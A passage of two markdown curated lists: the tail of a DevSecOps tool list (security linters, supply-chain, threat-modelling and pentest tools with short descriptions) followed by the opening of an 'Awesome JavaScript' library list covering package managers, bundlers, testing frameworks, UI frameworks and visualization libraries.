- [ESLint](https://eslint.org/) - _JS Foundation_ - Linting tool for JavaScript with multiple security linting rules available.
<!-- omit in toc -->
#### Go
- [Golang Security Checker](https://github.com/securego/gosec) - _securego_ - CLI tool to scan Go code for potential security flaws.
<!-- omit in toc -->
#### .NET
- [Security Code Scan](https://github.com/security-code-scan/security-code-scan) - _Security Code Scan_ - Static code analysis for C# and VB.NET applications.
<!-- omit in toc -->
#### PHP
- [Phan](https://github.com/phan/phan) - _Phan_ - Broad static analysis for PHP applications with some support for security scanning features.
- [PHPCS Security Audit](https://github.com/FloeDesignTechnologies/phpcs-security-audit) - _Floe_ - PHP static analysis with rules for PHP, Drupal 7 and PHP related CVEs.
- [Progpilot](https://github.com/designsecurity/progpilot) - _Design Security_ - Static analysis for PHP source code.
<!-- omit in toc -->
#### Python
- [Bandit](https://github.com/PyCQA/bandit) - _Python Code Quality Authority_ - Find common security vulnerabilities in Python code.
<!-- omit in toc -->
#### Ruby
- [Brakeman](https://github.com/presidentbeef/brakeman) - _Justin Collins_ - Static analysis tool which checks Ruby on Rails applications for security vulnerabilities.
- [DawnScanner](https://github.com/thesp0nge/dawnscanner) - _Paolo Perego_ - Security scanning for Ruby scripts and web application. Supports Ruby on Rails, Sinatra and Padrino frameworks.
### Supply Chain Security
Supply chain attacks come in different forms, targeting parts of the SDLC that are inherently 3rd party: tools in CI, external code that's been executed, and more. Supply chain security tooling can defend against these kinds of attacks.
- [Harden Runner GitHub Action](https://github.com/step-security/harden-runner) - _StepSecurity_ - installs a security agent on the GitHub-hosted runner (Ubuntu VM) to prevent exfiltration of credentials, detect compromised dependencies and build tools, and detect tampering of source code during the build.
- [Preflight](https://github.com/spectralops/preflight) - _Spectral_ - helps you verify scripts and executables to mitigate supply chain attacks in your CI and other systems, such as in the recent [Codecov hack](https://spectralops.io/blog/credentials-risk-supply-chain-lessons-from-the-codecov-breach/).
- [Sigstore](https://www.sigstore.dev/) - sigstore is a set of free to use and open source tools, including [fulcio](https://github.com/sigstore/fulcio), [cosign](https://github.com/sigstore/cosign) and [rekor](https://github.com/sigstore/rekor), handling digital signing, verification and checks for provenance needed to make it safer to distribute and use open source software.
### Threat Modelling
Threat modelling is an engineering exercise that aims to identify threats, vulnerabilities and attack vectors that represent a risk to something of value. Based on this understanding of threats, we can design, implement and validate security controls to mitigate threats. The following list of tools assist the threat modelling process.
- [Awesome Threat Modelling](https://github.com/hysnsec/awesome-threat-modelling) - _Practical DevSecOps_ - A curated list of threat modelling resources.
- [SecuriCAD](https://www.foreseeti.com/) - _Forseeti_ - Treat modelling and attack simulations for IT infrastructure.
- [IriusRisk](https://iriusrisk.com/) - _IriusRisk_ - Draw threat models and capture threats and countermeasures and manage risk.
- [Raindance Project](https://github.com/devsecops/raindance) - _DevSecOps_ - Use attack maps to identify attack surface and adversary strategies that may lead to compromise.
- [SD Elements](https://www.securitycompass.com/sdelements/threat-modeling/) - _Security Compass_ - Identify and rank threats, generate actionable tasks and track related tickets.
- [Threat Dragon](https://owasp.org/www-project-threat-dragon/) - _OWASP_ - Threat model diagramming tool.
- [Threat Modelling Tool](https://www.microsoft.com/en-us/securityengineering/sdl/threatmodeling) - _Microsoft_ - Threat model diagramming tool.
- [Threatspec](https://threatspec.org/) - _Threatspec_ - Define threat modelling as code.
## Related Lists
- [Awesome Dynamic Analysis](https://github.com/analysis-tools-dev/dynamic-analysis/) - _Matthias Endler_ - A collection of dynamic analysis tools and code quality checkers.
- [Awesome Static Analysis](https://github.com/analysis-tools-dev/static-analysis/) - _Matthias Endler_ - A collection of static analysis tools and code quality checkers.
- [Awesome Threat Modelling](https://github.com/hysnsec/awesome-threat-modelling) - _Practical DevSecOps_ - A curated list of threat modeling resources.
- [Vulnerable Web Apps Directory](https://owasp.org/www-project-vulnerable-web-applications-directory) - _OWASP_ - A collection of vulnerable web applications for learning purposes.
## Why collect the tools?
Spending a lot of time on applying DevSecOps is searching, comparing, and making decisions about tools. These tool lists are a good way to help you reduce unnecessary time and apply them quickly 😎
## List of Tool
| Type | Name | Description | Popularity | Language |
| ---------- | :---------- | :----------: | :----------: | :----------: |
| Build/SAST | [SonarQube](https://www.sonarqube.org/) | SonarQube is an open-source platform for continuous inspection of code quality to perform automatic reviews with static analysis of code to detect bugs, code smells, and security vulnerabilities on 20+ programming languages.|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray)|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray)
| Build/SAST | [codeql](https://github.com/github/codeql) | CodeQL | ![](https://img.shields.io/github/stars/github/codeql) | ![](https://img.shields.io/github/languages/top/github/codeql) |
| Build/SAST | [ggshield](https://github.com/GitGuardian/ggshield) | An open source CLI from GitGuardian to detect 350+ types of hardcoded secrets and 70+ IaC misconfigurations | ![](https://img.shields.io/github/stars/GitGuardian/ggshield) | ![](https://img.shields.io/github/languages/top/GitGuardian/ggshield) |
| Build/SAST | [semgrep](https://github.com/returntocorp/semgrep) | Lightweight static analysis for many languages. Find bug variants with patterns that look like source code. | ![](https://img.shields.io/github/stars/returntocorp/semgrep) | ![](https://img.shields.io/github/languages/top/returntocorp/semgrep) |
| Build/SAST | [sonarcloud-github-action](https://github.com/SonarSource/sonarcloud-github-action) | Integrate SonarCloud code analysis to GitHub Actions | ![](https://img.shields.io/github/stars/SonarSource/sonarcloud-github-action) | ![](https://img.shields.io/github/languages/top/SonarSource/sonarcloud-github-action) |
| Build/SECRET-MANAGE | [kamus](https://github.com/Soluto/kamus) | An open source, git-ops, zero-trust secret encryption and decryption solution for Kubernetes applications | ![](https://img.shields.io/github/stars/Soluto/kamus) | ![](https://img.shields.io/github/languages/top/Soluto/kamus) |
| Build/SECRET-MANAGE | [secrets-sync-action](https://github.com/google/secrets-sync-action) | A Github Action that can sync secrets from one repository to many others. | ![](https://img.shields.io/github/stars/google/secrets-sync-action) | ![](https://img.shields.io/github/languages/top/google/secrets-sync-action) |
| Build/SECRET-MANAGE | [vault-action](https://github.com/hashicorp/vault-action) | A GitHub Action that simplifies using HashiCorp Vault ™ secrets as build variables. | ![](https://img.shields.io/github/stars/hashicorp/vault-action) | ![](https://img.shields.io/github/languages/top/hashicorp/vault-action) |
| Design/THREAT | [owasp-threat-dragon-desktop](https://github.com/mike-goodwin/owasp-threat-dragon-desktop) | An installable desktop variant of OWASP Threat Dragon | ![](https://img.shields.io/github/stars/mike-goodwin/owasp-threat-dragon-desktop) | ![](https://img.shields.io/github/languages/top/mike-goodwin/owasp-threat-dragon-desktop) |
| Design/THREAT | [pytm](https://github.com/izar/pytm) | A Pythonic framework for threat modeling | ![](https://img.shields.io/github/stars/izar/pytm) | ![](https://img.shields.io/github/languages/top/izar/pytm) |
| Design/THREAT | [seasponge](https://github.com/mozilla/seasponge) | SeaSponge is an accessible threat modelling tool from Mozilla | ![](https://img.shields.io/github/stars/mozilla/seasponge) | ![](https://img.shields.io/github/languages/top/mozilla/seasponge) |
| Design/THREAT | [threagile](https://github.com/Threagile/threagile) | Agile Threat Modeling Toolkit | ![](https://img.shields.io/github/stars/Threagile/threagile) | ![](https://img.shields.io/github/languages/top/Threagile/threagile) |
| Operate and Monitor/COMPONENT-ANALYSIS | [dependency-track](https://github.com/DependencyTrack/dependency-track) | Dependency-Track is an intelligent Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. | ![](https://img.shields.io/github/stars/DependencyTrack/dependency-track) | ![](https://img.shields.io/github/languages/top/DependencyTrack/dependency-track) |
| Operate and Monitor/K8S | [kube-hunter](https://github.com/aquasecurity/kube-hunter) | Hunt for security weaknesses in Kubernetes clusters | ![](https://img.shields.io/github/stars/aquasecurity/kube-hunter) | ![](https://img.shields.io/github/languages/top/aquasecurity/kube-hunter) |
| Test/DAST | [action-baseline](https://github.com/zaproxy/action-baseline) | A GitHub Action for running the OWASP ZAP Baseline scan | ![](https://img.shields.io/github/stars/zaproxy/action-baseline) | ![](https://img.shields.io/github/languages/top/zaproxy/action-baseline) |
| Test/DAST | [action-dalfox](https://github.com/hahwul/action-dalfox) | XSS scanning with Dalfox on Github-action | ![](https://img.shields.io/github/stars/hahwul/action-dalfox) | ![](https://img.shields.io/github/languages/top/hahwul/action-dalfox) |
| Test/DAST | [action-full-scan](https://github.com/zaproxy/action-full-scan) | A GitHub Action for running the OWASP ZAP Full scan | ![](https://img.shields.io/github/stars/zaproxy/action-full-scan) | ![](https://img.shields.io/github/languages/top/zaproxy/action-full-scan) |
| Test/DAST | [zaproxy](https://github.com/zaproxy/zaproxy) | The OWASP ZAP core project | ![](https://img.shields.io/github/stars/zaproxy/zaproxy) | ![](https://img.shields.io/github/languages/top/zaproxy/zaproxy) |
| Test/PENTEST | [faraday](https://github.com/infobyte/faraday) | Collaborative Penetration Test and Vulnerability Management Platform | ![](https://img.shields.io/github/stars/infobyte/faraday) | ![](https://img.shields.io/github/languages/top/infobyte/faraday) |
| Test/PENTEST | [metasploit-framework](https://github.com/rapid7/metasploit-framework) | Metasploit Framework | ![](https://img.shields.io/github/stars/rapid7/metasploit-framework) | ![](https://img.shields.io/github/languages/top/rapid7/metasploit-framework) |
| Test/PENTEST | [monkey](https://github.com/guardicore/monkey) | Infection Monkey - An automated pentest tool | ![](https://img.shields.io/github/stars/guardicore/monkey) | ![](https://img.shields.io/github/languages/top/guardicore/monkey) |
| Test/PENTEST | [nuclei](https://github.com/projectdiscovery/nuclei) | Fast and customizable vulnerability scanner based on simple YAML based DSL. | ![](https://img.shields.io/github/stars/projectdiscovery/nuclei) | ![](https://img.shields.io/github/languages/top/projectdiscovery/nuclei) |
| Test/PENTEST | [ptf](https://github.com/trustedsec/ptf) | The Penetration Testers Framework (PTF) is a way for modular support for up-to-date tools. | ![](https://img.shields.io/github/stars/trustedsec/ptf) | ![](https://img.shields.io/github/languages/top/trustedsec/ptf) |
If you have any additional resources or links that you believe would benefit others, please feel free to contribute. Our goal is to create a repository of the best learning materials, ensuring everyone has access to top-notch content.
We appreciate your visit to this repository. If you find our initiatives valuable, kindly star this repository to show your support.
Thank you once again, and happy learning!
|
# Awesome JavaScript [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sorrycc/awesome-javascript/)
A collection of awesome browser-side [JavaScript](https://developer.mozilla.org/en-US/docs/Web/JavaScript) libraries, resources and shiny things.
* [Awesome JavaScript](#awesome-javascript)
* [Package Managers](#package-managers)
* [Component management](#component-management)
* [Loaders](#loaders)
* [Transpilers](#transpilers)
* [Bundlers](#bundlers)
* [Minimizers](#minimizers)
* [Type Checkers](#type-checkers)
* [Testing Frameworks](#testing-frameworks)
* [QA Tools](#qa-tools)
* [MVC Frameworks and Libraries](#mvc-frameworks-and-libraries)
* [Node-Powered CMS Frameworks](#node-powered-cms-frameworks)
* [Templating Engines](#templating-engines)
* [Game Engines](#game-engines)
* [Articles/Posts](#articles-and-posts)
* [Data Visualization](#data-visualization)
* [Timeline](#timeline)
* [Spreadsheet](#spreadsheet)
* [Editors](#editors)
* [Documentation](#documentation)
* Utilities
* [Files](#files)
* [Functional Programming](#functional-programming)
* [Reactive Programming](#reactive-programming)
* [Data Structure](#data-structure)
* [Date](#date)
* [String](#string)
* [Number](#number)
* [Storage](#storage)
* [Color](#color)
* [I18n And L10n](#i18n-and-l10n)
* [Control Flow](#control-flow)
* [Routing](#routing)
* [Security](#security)
* [Log](#log)
* [RegExp](#regexp)
* [Media](#videoaudio)
* [Voice Command](#voice-command)
* [API](#api)
* [Streaming](#streaming)
* [Vision Detection](#vision-detection)
* [Browser Detection](#browser-detection)
* [Operating System](#operating-system)
* [Benchmark](#benchmark)
* [Machine Learning](#machine-learning)
* [Web Worker](#web-worker)
* UI
* [Code Highlighting](#code-highlighting)
* [Loading Status](#loading-status)
* [Validation](#validation)
* [Keyboard Wrappers](#keyboard-wrappers)
* [Tours And Guides](#tours-and-guides)
* [Notifications](#notifications)
* [Sliders](#sliders)
* [Range Sliders](#range-sliders)
* [Form Widgets](#form-widgets)
* [Tips](#tips)
* [Modals and Popups](#modals-and-popups)
* [Scroll](#scroll)
* [Menu](#menu)
* [Table/Grid](#tablegrid)
* [Frameworks](#frameworks-1)
* [Boilerplates](#boilerplates)
* [Image](#image)
* [Gesture](#gesture)
* [Maps](#maps)
* [Typography](#typography)
* [Animations](#animations)
* [Image processing](#image-processing)
* [ES6](#es6)
* [Generators](#generators)
* [Full Text Search](#full-text-search)
* [SDK](#sdk)
* [Misc](#misc)
* [Worth Reading](#worth-reading)
* [Other Awesome Lists](#other-awesome-lists)
* [Contributing](#contributing)
----
## Package Managers
*Host the JavaScript libraries and provide tools for fetching and packaging them.*
* [npm](https://www.npmjs.com/) - npm is the package manager for JavaScript.
* [Bower](https://github.com/bower/bower) - A package manager for the web.
* [component](https://github.com/componentjs/component) - Client package management for building better web applications.
* [spm](https://github.com/spmjs/spm) - Brand new static package manager.
* [jam](https://github.com/caolan/jam) - A package manager using a browser-focused and RequireJS compatible repository.
* [jspm](https://github.com/jspm/jspm-cli) - Frictionless browser package management.
* [Ender](https://github.com/ender-js/Ender) - The no-library library.
* [volo](https://github.com/volojs/volo) - Create front end projects from templates, add dependencies, and automate the resulting projects.
* [Duo](https://github.com/duojs/duo) - Next-generation package manager that blends the best ideas from Component, Browserify and Go to make organizing and writing front-end code quick and painless.
* [yarn](https://yarnpkg.com/) - Fast, reliable, and secure dependency management.
* [pnpm](https://pnpm.io/) - Fast, disk space efficient package manager.
## Component Management
* [Bit](https://github.com/teambit/bit) - Create, find and reuse components (React, Angular, Node etc.) across applications.
## Loaders
*Module or loading system for JavaScript.*
* [RequireJS](https://github.com/requirejs/requirejs) - A file and module loader for JavaScript.
* [browserify](https://github.com/substack/node-browserify) - Browser-side require() the node.js way.
* [SeaJS](https://github.com/seajs/seajs) - A Module Loader for the Web.
* [HeadJS](https://github.com/headjs/headjs) - The only script in your HEAD.
* [lazyload](https://github.com/rgrove/lazyload/) - Tiny, dependency-free async JavaScript and CSS loader.
* [script.js](https://github.com/ded/script.js) - Asynchronous JavaScript loader and dependency manager.
* [systemjs](https://github.com/systemjs/systemjs) - AMD, CJS & ES6 spec-compliant module loader.
* [LodJS](https://github.com/yanhaijing/lodjs) - Module loader based on AMD.
* [ESL](https://github.com/ecomfe/esl) - Module loader browser first, support lazy define and AMD.
* [modulejs](https://github.com/lrsjng/modulejs) - Lightweight JavaScript module system.
## Transpilers
*Software that converts the modern JavaScript syntax into the older JavaScript syntax.*
* [SWC](https://swc.rs/) - Extensible Rust-based platform for compilation.
## Bundlers
* [webpack](https://github.com/webpack/webpack) - Packs CommonJs/AMD modules for the browser.
* [Rollup](https://github.com/rollup/rollup) - Next-generation ES6 module bundler.
* [Brunch](https://github.com/brunch/brunch) - Fast front-end web app build tool with simple declarative config.
* [Parcel](https://github.com/parcel-bundler/parcel) - Blazing fast, zero configuration web application bundler.
* [Microbundle](https://github.com/developit/microbundle) - Zero-configuration bundler for tiny modules.
* [FuseBox](https://github.com/fuse-box/fuse-box) - A bundler that does it right
* [Snowpack](https://www.snowpack.dev/) - A lightning-fast frontend build tool, designed for the modern web.
# Minimizers
* [Terser](https://github.com/terser/terser) - parser, mangler and compressor toolkit for ES6+
* [Uglify](https://github.com/mishoo/UglifyJS) - parser / mangler / compressor / beautifier toolkit
## Type Checkers
* [TypeScript](https://www.typescriptlang.org/) - A typed superset of JavaScript that compiles to plain JavaScript.
* [Flow.js](https://flow.org/) - A static type checker for JavaScript from Facebook.
* [Hegel](https://hegel.js.org/) - A static type checker for JavaScript with a bias on type inference an strong type system.
* [TypL](https://github.com/getify/TypL) - the JavaScript Type Linter with a bias on type inference.
* [Hindley Milner Definitions](https://github.com/xodio/hm-def) - runtime type checking for JavaScript functions using Haskell-alike Hindley Milner type signatures.
## Testing Frameworks
### Frameworks
* [mocha](https://github.com/mochajs/mocha) - Simple, flexible, fun JavaScript test framework for node.js & the browser.
* [jasmine](https://github.com/jasmine/jasmine) - DOM-less simple JavaScript testing framework.
* [qunit](https://github.com/jquery/qunit) - An easy-to-use JavaScript Unit Testing framework.
* [jest](https://github.com/facebook/jest) - Painless JavaScript Unit Testing.
* [prova](https://github.com/azer/prova) - Node & Browser test runner based on Tape and Browserify
* [DalekJS](https://github.com/dalekjs/dalek) - Automated cross browser functional testing with JavaScript
* [Protractor](https://github.com/angular/protractor) - Protractor is an end-to-end test framework for AngularJS applications.
* [tape](https://github.com/substack/tape) - Tap-producing test harness for node and browsers.
* [TestCafe](https://github.com/DevExpress/testcafe) - Automated browser testing for the modern web development stack.
* [ava](https://github.com/avajs/ava) - 🚀 Futuristic JavaScript test runner
* [Cypress](https://www.cypress.io/) - Complete end-to-end testing framework for anything that runs in a browser and beyond.
### Assertion
* [chai](https://github.com/chaijs/chai) - BDD / TDD assertion framework for node.js and the browser that can be paired with any testing framework.
* [Enzyme](https://airbnb.io/enzyme/index.html) - Enzyme is a JavaScript Testing utility for React that makes it easier to assert, manipulate, and traverse your React Components' output.
* [react testing library](https://github.com/kentcdodds/react-testing-library) - Simple and complete React DOM testing utilities that encourage good testing practices.
* [Sinon.JS](https://github.com/sinonjs/sinon) - Test spies, stubs, and mocks for JavaScript.
* [expect.js](https://github.com/Automattic/expect.js) - Minimalistic BDD-style assertions for Node.JS and the browser.
* [proxyquire](https://github.com/thlorenz/proxyquire) - Stub nodejs's require.
### Coverage
* [istanbul](https://github.com/gotwarlost/istanbul) - Yet another JS code coverage tool.
* [blanket](https://github.com/alex-seville/blanket) - A simple code coverage library for JavaScript. Designed to be easy to install and use, for both browser and nodejs.
* [JSCover](https://github.com/tntim96/JSCover) - JSCover is a tool that measures code coverage for JavaScript programs.
### Runner
* [phantomjs](https://github.com/ariya/phantomjs) - Scriptable Headless WebKit.
* [slimerjs](https://github.com/laurentj/slimerjs) - A PhantomJS-like tool running Gecko.
* [casperjs](https://github.com/casperjs/casperjs) - Navigation scripting & testing utility for PhantomJS and SlimerJS.
* [zombie](https://github.com/assaf/zombie) - Insanely fast, full-stack, headless browser testing using node.js.
* [totoro](https://github.com/totorojs/totoro) - A simple and stable cross-browser testing tool.
* [karma](https://github.com/karma-runner/karma) - Spectacular Test Runner for JavaScript.
* [nightwatch](https://github.com/nightwatchjs/nightwatch) - UI automated testing framework based on node.js and selenium webdriver.
* [intern](https://github.com/theintern/intern) - A next-generation code testing stack for JavaScript.
* [puppeteer](https://github.com/GoogleChrome/puppeteer) - Headless Chrome Node.js API by official Google Chrome team.
* [webdriverio](https://github.com/webdriverio/webdriverio) - Next-gen WebDriver test automation framework for Node.js.
* [taiko](https://github.com/getgauge/taiko) - A Node.js library with a simple API to automate Chromium based browsers.
* [Playwright](https://github.com/microsoft/playwright) - Node.js library to automate Chromium, Firefox and WebKit with a single API.
## QA Tools
* [prettier](https://github.com/prettier/prettier) - Prettier is an opinionated code formatter.
* [JSHint](https://github.com/jshint/jshint/) - JSHint is a tool that helps to detect errors and potential problems in your JavaScript code.
* [jscs](https://github.com/jscs-dev/node-jscs) - JavaScript Code Style checker.
* [jsfmt](https://github.com/rdio/jsfmt) - For formatting, searching, and rewriting JavaScript.
* [jsinspect](https://github.com/danielstjules/jsinspect) - Detect copy-pasted and structurally similar code.
* [buddy.js](https://github.com/danielstjules/buddy.js) - Magic number detection for JavaScript.
* [ESLint](https://github.com/eslint/eslint) - A fully pluggable tool for identifying and reporting on patterns in JavaScript.
* [JSLint](https://github.com/douglascrockford/JSLint) - High-standards, strict & opinionated code quality tool, aiming to keep only good parts of the language.
* [JavaScript Standard Style](https://github.com/feross/standard) - Opinionated, no-configuration style guide, style checker, and formatter
* [Pre-evaluate code at buildtime](https://github.com/kentcdodds/preval.macro) - Pre-evaluate your front end javascript code at build-time
* [JS-Beautifier](https://github.com/beautify-web/js-beautify) - Npm cli and library to format JS code.
* [husky](https://github.com/typicode/husky) - Prevents bad git commit, git push and more.
## MVC Frameworks and Libraries
* [angular.js](https://github.com/angular/angular.js) - HTML enhanced for web apps. (deprecated)
* [angular](https://github.com/angular/angular) - Angular is a development platform for building mobile and desktop web applications using Typescript/JavaScript and other languages.
* [aurelia](http://aurelia.io) - A JavaScript client framework for mobile, desktop and web.
* [backbone](https://github.com/jashkenas/backbone) - Give your JS App some Backbone with Models, Views, Collections, and Events.
* [ember.js](https://github.com/emberjs/ember.js) - A JavaScript framework for creating ambitious web applications.
* [meteor](https://github.com/meteor/meteor) - An ultra-simple, database-everywhere, data-on-the-wire, pure-javascript web framework.
* [ractive](https://github.com/ractivejs/ractive) - Next-generation DOM manipulation.
* [vue](https://github.com/vuejs/vue) - Intuitive, fast & composable MVVM for building interactive interfaces.
* [svelte](https://github.com/sveltejs/svelte) - Svelte is a new way to build web applications. It's a compiler that takes your declarative components and converts them into efficient JavaScript that surgically updates the DOM.
* [knockout](https://github.com/knockout/knockout) - Knockout makes it easier to create rich, responsive UIs with JavaScript.
* [spine](https://github.com/spine/spine) - Lightweight MVC library for building JavaScript applications.
* [espresso.js](https://github.com/techlayer/espresso.js) - A minimal JavaScript library for crafting user interfaces.
* [canjs](https://github.com/canjs/canjs) - Can do JS, better, faster, easier.
* [react](https://reactjs.org/) - A library for building user interfaces. It's declarative, efficient, and extremely flexible. Works with a Virtual DOM.
* [hyperapp](https://github.com/hyperapp/hyperapp) - 1kb JavaScript library for building frontend applications.
* [preact](https://github.com/developit/preact) - Fast 3kb React alternative with the same ES6 API. Components & Virtual DOM.
* [nativescript](https://github.com/NativeScript/NativeScript) - Build truly native cross-platform iOS and Android apps with JavaScript.
* [react-native](https://github.com/facebook/react-native) - A framework for building native apps with React.
* [riot](https://github.com/riot/riot) - React-like library, but with very small size.
* [thorax](https://github.com/walmartlabs/thorax) - Strengthening your Backbone.
* [chaplin](https://github.com/chaplinjs/chaplin) - An architecture for JavaScript applications using the Backbone.js library.
* [marionette](https://github.com/marionettejs/backbone.marionette) - A composite application library for Backbone.js that aims to simplify the construction of large scale JavaScript applications.
* [ripple](https://github.com/ripplejs/ripple) - A tiny foundation for building reactive views.
* [rivets](https://github.com/mikeric/rivets) - Lightweight and powerful data binding + templating solution.
* [derby](https://github.com/derbyjs/derby) - MVC framework making it easy to write realtime, collaborative applications that run in both Node.js and browsers.
* [derby-awesome](https://github.com/russll/awesome-derby) - A collection of awesome derby components
* [way.js](https://github.com/gwendall/way.js) - Simple, lightweight, persistent two-way databinding.
* [mithril.js](https://github.com/lhorie/mithril.js) - Mithril is a client-side MVC framework (Light-weight, Robust, Fast).
* [jsblocks](https://github.com/astoilkov/jsblocks) - jsblocks is better MV-ish framework.
* [feathers](https://github.com/feathersjs/feathers) - A minimalist real-time JavaScript framework for tomorrow's apps.
* [Keo](https://github.com/Wildhoney/Keo) - Functional stateless React components with Shadow DOM support.
* [atvjs](https://github.com/emadalam/atvjs) - Blazing fast Apple TV application development using pure JavaScript.
* [Alpine.js](https://github.com/alpinejs/alpine) - offers you the reactive and declarative nature of big frameworks like Vue or React at a much lower cost.
* [inferno](https://github.com/infernojs/inferno) - 🔥 An extremely fast, React-like JavaScript library for building modern user interfaces.
* [FoalTS](https://foalts.org) - Elegant and all-inclusive Node.JS framework for building web applications (TypeScript).
* [Lucia](https://github.com/aidenybai/lucia) - 3kb library for tiny web apps.
* [Adonis](https://github.com/adonisjs/core) - The Node.js Framework highly focused on developer ergonomics, stability and confidence.
* [GrapesJS](https://github.com/artf/grapesjs) - Free and Open source Web Builder Framework. Next generation tool for building templates without coding.
* [Rete.js](https://github.com/retejs/rete) - A modular framework for visual programming allows to create node based editor in browser.
* [litegraph.js](https://github.com/jagenjo/litegraph.js) - A graph node engine and editor similar to PD or UDK Blueprints, comes with its own editor in HTML5 Canvas2D.
* [Drawflow](https://github.com/jerosoler/Drawflow) - This allow you to create data flows easily and quickly.
* [Blockly](https://github.com/google/blockly) - A library that adds a visual code editor to web and mobile apps by Google.
* [Million](https://github.com/aidenybai/million) - <1kb compiler-focused virtual DOM. It's fast!
* [Whatsup](https://github.com/whatsup/whatsup) - A frontend framework for chillout-mode development 🥤. JSX components on generators, fast mobx-like state management and exclusive cssx style system.
## Node-Powered CMS Frameworks
* [KeystoneJS](https://github.com/keystonejs/keystone) - powerful CMS and web app framework.
* [Reaction Commerce](https://github.com/reactioncommerce/reaction) - reactive CMS, real-time architecture and design.
* [Ghost](https://github.com/tryghost/Ghost) - simple, powerful publishing platform.
* [Apostrophe](https://github.com/punkave/apostrophe) - CMS with content editing and essential services.
* [We.js](https://github.com/wejs/we/) - framework for real time apps, sites or blogs.
* [Hatch.js](https://github.com/inventures/hatchjs) - CMS platform with social features.
* [TaracotJS](https://github.com/xtremespb/taracotjs-generator/) - fast and minimalist CMS based on Node.js.
* [Nodizecms](https://github.com/nodize/nodizecms) - CMS for CoffeeScript lovers.
* [Cody](https://github.com/jcoppieters/cody) - CMS with WSYWYG editor.
* [PencilBlue](https://github.com/pencilblue/pencilblue/) - CMS and blogging platform.
* [Strapi](https://github.com/strapi/strapi) - Open source Node.js Headless CMS to easily build customisable APIs.
* [Factor](https://github.com/fiction-com/factor) - The Javascript CMS
## Templating Engines
*Templating engines allow you to perform string interpolation.*
* [mustache.js](https://github.com/janl/mustache.js) - Minimal templating with {{mustaches}} in JavaScript.
* [handlebars.js](https://github.com/handlebars-lang/handlebars.js) - An extension to the Mustache templating language.
* [nunjucks](https://mozilla.github.io/nunjucks/) - A rich and powerful templating language for JavaScript from Mozilla.
* [hogan.js](https://github.com/twitter/hogan.js) - A compiler for the Mustache templating language.
* [doT](https://github.com/olado/doT) - The fastest + concise JavaScript template engine for nodejs and browsers.
* [dustjs](https://github.com/linkedin/dustjs/) - Asynchronous templates for the browser and node.js.
* [eco](https://github.com/sstephenson/eco/) - Embedded CoffeeScript templates.
* [JavaScript-Templates](https://github.com/blueimp/JavaScript-Templates) - < 1KB lightweight, fast & powerful JavaScript templating engine with zero dependencies.
* [t.js](https://github.com/jasonmoo/t.js) - A tiny JavaScript templating framework in ~400 bytes gzipped.
* [Pug](https://github.com/pugjs/pug) - Robust, elegant, feature rich template engine for nodejs. (formerly known as Jade)
* [EJS](https://github.com/mde/ejs) - Effective JavaScript templating.
* [xtemplate](https://github.com/xtemplate/xtemplate) - eXtensible Template Engine lib for node and the browser
* [marko](https://github.com/marko-js/marko) - A fast, lightweight, HTML-based templating engine for Node.js and the browser with async, streaming, custom tags and CommonJS modules as compiled output.
* [swig](https://github.com/paularmstrong/swig) - (Archived) A simple, powerful, and extendable Node.js and browser-based JavaScript template engine.
## Game Engines
* [A-Frame](https://aframe.io) - Make WebVR.
* [Cocos](https://www.cocos.com) - Open Source Cross-Platform Game Development Framework.
* [Impact](https://impactjs.com) - Impact - HTML5 Canvas & JavaScript Game Engine.
* [GDevelop](https://gdevelop.io) - Free and Easy Game-Making App.
* [Kaboom.js](https://kaboomjs.com) - A game programming library that helps you make games fast and fun.
* [Matter.js](https://brm.io/matter-js) - A 2D rigid body JavaScript physics engine.
* [melonJS](https://melonjs.org) - Open source HTML5 game engine that empowers developers and designers to focus on content.
* [Phaser](https://phaser.io) - Phaser - A fast, fun and free open source HTML5 game framework.
* [PixiJS](https://pixijs.com) - The HTML5 Creation Engine.
* [PlayCanvas](https://playcanvas.com) - PlayCanvas WebGL Game Engine.
## Articles and Posts
* [The JavaScript that you should know](https://medium.com/@pedropolisenso/o-javasscript-que-voc%C3%AA-deveria-conhecer-b70e94d1d706) - Article about concepts of JavaScript Functional.
* [How JavaScript works](https://blog.sessionstack.com/tagged/tutorial) - A series of articles about the building blocks of JavaScript.
* [Multi-threading using web-workers](https://www.loginradius.com/blog/async/adding-multi-threading-to-javascript-using-web-workers/) - Web Workers: Adding Multi-threading to JavaScript
* [this keyword in JavaScript](https://www.loginradius.com/blog/async/breaking-down-this-keyword-in-javascript/) - Breaking down the 'this' keyword in JavaScript
## Data Visualization
*Data visualization tools for the web.*
* [d3](https://github.com/d3/d3) - A JavaScript visualization library for HTML and SVG.
* [metrics-graphics](https://github.com/mozilla/metrics-graphics) - A library optimized for concise, principled data graphics and layouts.
* [three.js](https://github.com/mrdoob/three.js) - JavaScript 3D library.
* [Chart.js](https://github.com/chartjs/Chart.js) - Simple HTML5 Charts using the <canvas> tag.
* [paper.js](https://github.com/paperjs/paper.js) - The Swiss Army Knife of Vector Graphics Scripting – Scriptographer ported to JavaScript and the browser, using HTML5 Canvas.
* [fabric.js](https://github.com/kangax/fabric.js) - JavaScript Canvas Library, SVG-to-Canvas (& canvas-to-SVG) Parser.
* [peity](https://github.com/benpickles/peity) - Progressive <svg> bar, line and pie charts.
* [raphael](https://github.com/DmitryBaranovskiy/raphael) - JavaScript Vector Library.
* [echarts](https://github.com/apache/echarts) - Enterprise Charts.
* [visjs](https://github.com/visjs) - Multiple Libraries for dynamic, browser-based data visualization.
* [two.js](https://github.com/jonobr1/two.js) - A renderer agnostic two-dimensional drawing api for the web.
* [g.raphael](https://github.com/DmitryBaranovskiy/g.raphael) - Charts for Raphaël.
* [sigma.js](https://github.com/jacomyal/sigma.js) - A JavaScript library dedicated to graph drawing.
* [arbor](https://github.com/samizdatco/arbor) - A graph visualization library using web workers and jQuery.
* [cubism](https://github.com/square/cubism) - A D3 plugin for visualizing time series.
* [dc.js](https://github.com/dc-js/dc.js) - Multi-Dimensional charting built to work natively with crossfilter rendered with d3.js
* [vega](https://github.com/trifacta/vega) - A visualization grammar.
* [processing.js](http://processingjs.org/) - Processing.js makes your data visualizations work using web standards and without any plug-ins.
* [envisionjs](https://github.com/HumbleSoftware/envisionjs) - Dynamic HTML5 visualization.
* [rickshaw](https://github.com/shutterstock/rickshaw) - JavaScript toolkit for creating interactive real-time graphs.
